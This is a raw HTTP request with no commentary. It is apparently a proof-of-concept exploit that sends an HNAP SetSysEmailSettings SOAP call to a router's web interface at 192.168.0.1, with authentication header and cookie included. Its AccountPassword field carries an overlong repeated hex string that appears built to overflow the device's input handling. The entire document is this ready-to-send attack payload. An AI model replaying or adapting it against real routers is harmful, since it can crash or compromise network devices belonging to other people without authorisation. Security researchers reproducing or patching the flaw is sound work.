POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml
SOAPACTION: "http://purenetworks.com/HNAP1/SetSysEmailSettings"
HNAP_AUTH: 9AD3F91BDC05D7CD7C9773C8EFBFE79C 1676880125
Content-Length: 895
Origin: http://192.168.0.1
Connection: keep-alive
Referer: http://192.168.0.1/SystemLog.html
Cookie: uid=VK7UEwmgY2

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
		<SetSysEmailSettings xmlns="http://purenetworks.com/HNAP1/">
			<SysEmail>true</SysEmail>
			<EmailFrom>12548156@qq.com</EmailFrom>
			<EmailTo>14254665@qq.com</EmailTo>
			<EmailSubject/>
			<SMTPServerAddress>12</SMTPServerAddress>
			<SMTPServerPort>25</SMTPServerPort>
			<Authentication>true</Authentication>
			<AccountName>1</AccountName>
			<AccountPassword>8b51767b8abe4347aab6babb8884ab841651767b8abe4347aab60dbb88ffab841651767b8abe4347aab60dbb88ffab841651767b8abe4347aab60dbb88ffab84</AccountPassword>
			<OnLogFull>true</OnLogFull>
			<OnSchedule>true</OnSchedule>
			<ScheduleName>Always</ScheduleName>
		</SetSysEmailSettings>
	</soap:Body>
</soap:Envelope>